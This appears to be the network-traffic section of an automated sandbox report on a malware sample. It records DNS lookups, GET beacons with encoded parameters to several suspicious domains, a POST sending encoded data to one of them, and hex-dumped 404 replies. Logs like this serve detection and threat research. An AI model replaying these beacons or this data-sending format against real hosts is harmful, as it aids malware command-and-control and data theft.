                Source: global trafficHTTP traffic detected: GET /nl7t/?wFVH=-zwTKPF0iPth&eL-x=RWsARM6Yi7RnQLBC+16RpV9reqvPmlYamaxPbU5yIu+RywNq6+kGZBpb8CtNMSbq9u/pp337VPx8joE31Mh05zxcUPnHpfTXXTBrDMJcL7sQ64A9tw== HTTP/1.1Host: www.5hdgb2p9a.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                Source: global trafficHTTP traffic detected: GET /bjtw/?eL-x=csNti9Ni0CMSF+Luu5Lb4YGLWTncdI4NtLZHzGNdKQ96nntWCfQjnA+gcdSxDY8YzUt2/7rDdvxAnlLOvCpJP4lTvOHTPP+iYlkpfhDtlBKj7b5q5w==&wFVH=-zwTKPF0iPth HTTP/1.1Host: www.j252mv.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                Source: global trafficHTTP traffic detected: GET /u5w9/?eL-x=A3LutOpKcAePelibJkXDDYFDO+A/U7kX8Qw8AI5F82KOCrYaBuw+x7BD9zmk5lVUkEcfBKV2GIclDvoU+V9Cq0mSlb4StpI39XWYwC+owI+4erZmyw==&wFVH=-zwTKPF0iPth HTTP/1.1Host: www.lnnn.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                Source: global trafficHTTP traffic detected: GET /dblf/?eL-x=xA4m52UOO3AWG6dLOPkkJ91gfa/sOtMUS9WQ9/7Ili2Upd70ADnAJWaIHnvs9U+whG/nDh7qG8iCbCHdOukQeWX5e+ZPWvcCIT2YOJAlrSuLiE5N6g==&wFVH=-zwTKPF0iPth HTTP/1.1Host: www.7153115.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                Source: global trafficHTTP traffic detected: GET /njro/?wFVH=-zwTKPF0iPth&eL-x=4m2dXuyzH1K67YjRiF0xgcinYZd6F04lkWHhJhjAgk74IEPWOAVZvwb6DAALc1Sd7YFs2hEz0292kCRHtftOb0bCUTNRw6g5HYfyDosdAoVL7yu4Ug== HTTP/1.1Host: www.tingba.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                Source: global trafficHTTP traffic detected: GET /14ny/?eL-x=RcS/7b6AyQg4ZUqZZRdiR4QAk8bBBIP44+AM+xEUzuW33DbFu14QWxhHRozVg07q+e31G6ugIhvO9kCRCtuNtETua9CX3TPbBNSnRMkK6/CxEYN7+Q==&wFVH=-zwTKPF0iPth HTTP/1.1Host: www.jllllbx.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                Source: global trafficDNS traffic detected: DNS query: www.mt2rahu.tech
                Source: global trafficDNS traffic detected: DNS query: www.lexjetcenter.net
                Source: global trafficDNS traffic detected: DNS query: www.elarac.top
                Source: global trafficDNS traffic detected: DNS query: www.budged.net
                Source: global trafficDNS traffic detected: DNS query: www.5hdgb2p9a.buzz
                Source: global trafficDNS traffic detected: DNS query: www.j252mv.site
                Source: global trafficDNS traffic detected: DNS query: www.lnnn.fun
                Source: global trafficDNS traffic detected: DNS query: www.7153115.xyz
                Source: global trafficDNS traffic detected: DNS query: www.tingba.sbs
                Source: global trafficDNS traffic detected: DNS query: www.jllllbx.top
                Source: unknownHTTP traffic detected: POST /favd/ HTTP/1.1Host: www.elarac.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateOrigin: http://www.elarac.topContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeContent-Length: 193Referer: http://www.elarac.top/favd/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5Data Raw: 65 4c 2d 78 3d 62 76 49 4e 43 45 32 2b 41 74 31 53 73 6b 6d 37 66 2f 41 74 52 6f 42 2b 6b 7a 66 59 51 52 4b 50 47 65 41 79 71 42 43 4c 67 47 45 4f 31 65 2b 4a 61 6c 73 37 34 47 55 63 73 46 50 62 52 42 2b 35 5a 49 76 55 70 59 70 50 68 4c 6e 2f 6e 58 67 72 62 37 59 78 4d 78 6d 31 63 79 2f 77 54 45 70 4e 36 77 79 59 57 58 2f 39 31 65 48 43 77 6b 73 78 78 2f 54 51 72 57 4c 50 42 50 59 39 62 68 2f 30 78 39 43 6f 56 43 57 38 63 57 49 32 75 71 33 77 2b 35 4c 6a 42 51 30 37 63 6d 4c 63 71 37 67 6c 35 78 34 6f 72 55 2b 2f 38 4e 51 7a 35 50 58 37 38 48 63 77 71 72 30 42 33 55 6e 55 Data Ascii: eL-x=bvINCE2+At1Sskm7f/AtRoB+kzfYQRKPGeAyqBCLgGEO1e+Jals74GUcsFPbRB+5ZIvUpYpPhLn/nXgrb7YxMxm1cy/wTEpN6wyYWX/91eHCwksxx/TQrWLPBPY9bh/0x9CoVCW8cWI2uq3w+5LjBQ07cmLcq7gl5x4orU+/8NQz5PX78Hcwqr0B3UnU
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:50:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:50:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:50:43 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:50:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:51:22 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:17:25 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 73 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 6f 2e 6a 70 2f 69 6d 61 67 65 73 2f 70 75 62 6c 69 63 2f 63 6f 6d 6d 6f 6e 2f 6c 6f 67 6f 2e 67 69 66 22 20 61 6c 74 3d 22 47 4d 4f 20 49 6e 74 65 72 6e 65 74 2c 20 49 6e 63 2e 22 3e 3c 2f 68 31 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 22 3e 0a 3c 68 31 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 65 74 61 69 6c 22 3e e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 9a e3 83 bc e3 82 b8 ef bc 88 55 52 4c ef bc 89 e3 81 af e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 80 82 3c 2f 70 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 61 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 6e 61 6d 61 65 2d 73 65 72 76 65 72 2e 63 6f 6d 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 20 e3 83 ac e3 83 b3 e3 82 bf e3 83 ab e3 82 b5 e3 83 bc e3 83 90 e3 83 bc e3 81 ae e3 83 88 e3 83 83 e3 83 97 e3 83 9a e3 83 bc e3 82 b8 e3 81 ab e6 88 bb e3 82 8b 3c 2f 61 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:51:25 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:17:25 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 73 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 6f 2e 6a 70 2f 69 6d 61 67 65 73 2f 70 75 62 6c 69 63 2f 63 6f 6d 6d 6f 6e 2f 6c 6f 67 6f 2e 67 69 66 22 20 61 6c 74 3d 22 47 4d 4f 20 49 6e 74 65 72 6e 65 74 2c 20 49 6e 63 2e 22 3e 3c 2f 68 31 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 22 3e 0a 3c 68 31 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 65 74 61 69 6c 22 3e e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 9a e3 83 bc e3 82 b8 ef bc 88 55 52 4c ef bc 89 e3 81 af e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 80 82 3c 2f 70 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 61 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 6e 61 6d 61 65 2d 73 65 72 76 65 72 2e 63 6f 6d 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 20 e3 83 ac e3 83 b3 e3 82 bf e3 83 ab e3 82 b5 e3 83 bc e3 83 90 e3 83 bc e3 81 ae e3 83 88 e3 83 83 e3 83 97 e3 83 9a e3 83 bc e3 82 b8 e3 81 ab e6 88 bb e3 82 8b 3c 2f 61 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:51:27 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:17:25 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 73 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 6f 2e 6a 70 2f 69 6d 61 67 65 73 2f 70 75 62 6c 69 63 2f 63 6f 6d 6d 6f 6e 2f 6c 6f 67 6f 2e 67 69 66 22 20 61 6c 74 3d 22 47 4d 4f 20 49 6e 74 65 72 6e 65 74 2c 20 49 6e 63 2e 22 3e 3c 2f 68 31 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 22 3e 0a 3c 68 31 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 65 74 61 69 6c 22 3e e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 9a e3 83 bc e3 82 b8 ef bc 88 55 52 4c ef bc 89 e3 81 af e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 80 82 3c 2f 70 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 61 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 6e 61 6d 61 65 2d 73 65 72 76 65 72 2e 63 6f 6d 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 20 e3 83 ac e3 83 b3 e3 82 bf e3 83 